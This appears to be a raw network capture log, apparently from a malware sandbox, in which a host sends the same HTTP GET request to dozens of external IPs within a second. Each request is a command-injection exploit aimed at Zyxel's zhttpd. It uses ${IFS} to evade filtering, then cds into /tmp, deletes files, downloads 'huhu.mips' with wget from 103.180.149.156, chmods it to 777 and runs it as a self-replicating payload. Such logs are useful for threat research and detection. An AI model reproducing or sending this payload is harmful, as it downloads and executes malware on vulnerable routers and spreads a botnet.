                                                      Feb 2, 2024 06:36:02.841033936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6777192.168.2.144049852.183.208.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841073036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6778192.168.2.145389063.29.178.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841104031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6779192.168.2.1448492130.173.246.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841156006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6780192.168.2.145530844.238.77.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841181993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6781192.168.2.1450616170.224.78.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841224909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6782192.168.2.145678293.35.102.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841259003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6783192.168.2.146081625.21.35.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841294050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6784192.168.2.144502467.16.72.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841336966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6785192.168.2.1460150216.194.119.255443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841368914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6786192.168.2.1450754121.134.115.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841449022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6787192.168.2.1458134201.25.199.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841473103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6788192.168.2.1459068111.140.134.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841532946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6789192.168.2.1457512136.213.235.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841557980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6790192.168.2.143811861.226.132.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841631889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6791192.168.2.144407459.99.255.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841655970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6792192.168.2.144140672.186.161.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841706038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6793192.168.2.1442742193.41.246.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841752052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6794192.168.2.1459672159.11.139.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841778994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6795192.168.2.1451846184.47.192.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841820002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6796192.168.2.1458806135.147.28.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841864109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6797192.168.2.1448326105.7.165.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841907024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6798192.168.2.144113271.10.154.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841949940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6799192.168.2.1454458223.80.177.159443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.841976881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6800192.168.2.14355822.135.125.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842041016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6801192.168.2.1440452207.10.62.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842077017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6802192.168.2.1452970188.40.121.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842132092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6803192.168.2.1449010117.64.17.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842173100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6804192.168.2.1453402189.144.220.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842215061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6805192.168.2.143495065.74.231.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842240095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6806192.168.2.1450948132.103.124.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842307091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6807192.168.2.1435718208.201.231.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842336893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6808192.168.2.1452416208.11.214.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842379093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6809192.168.2.1433490168.73.186.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842426062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6810192.168.2.1450068187.133.73.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842453957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6811192.168.2.1440194174.233.32.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842508078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6812192.168.2.145166474.111.160.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842547894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6813192.168.2.1440162176.27.50.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842633009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6814192.168.2.1441326213.83.20.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842665911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6815192.168.2.1451962213.199.20.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842708111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6816192.168.2.1439160221.154.117.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842741013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6817192.168.2.1434894210.251.0.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842793941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6818192.168.2.144825035.138.196.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842843056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6819192.168.2.145099271.169.10.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842880011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6820192.168.2.1458430137.243.88.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842926979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6821192.168.2.1445448177.220.162.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842945099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6822192.168.2.1445922160.82.72.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.842999935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6823192.168.2.1439246157.239.58.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843038082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6824192.168.2.144833645.114.243.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843055964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6825192.168.2.1459334130.15.28.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843103886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6826192.168.2.145916623.254.237.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843158007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6827192.168.2.144533418.241.135.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843174934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6828192.168.2.1434468152.78.75.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843230009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6829192.168.2.1454778133.74.14.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843266964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6830192.168.2.1437506145.209.186.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843317986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6831192.168.2.145850480.153.41.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843346119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6832192.168.2.143789646.182.150.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843398094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6833192.168.2.1433150124.120.223.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843445063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6834192.168.2.145653259.117.188.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843498945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6835192.168.2.143718224.124.180.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843529940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6836192.168.2.1434082121.76.182.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843571901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6837192.168.2.1455108156.119.204.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843619108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6838192.168.2.144539294.95.129.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:02.843667030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6839192.168.2.145130475.253.88.176443
                                                      TimestampBytes transferredDirectionData
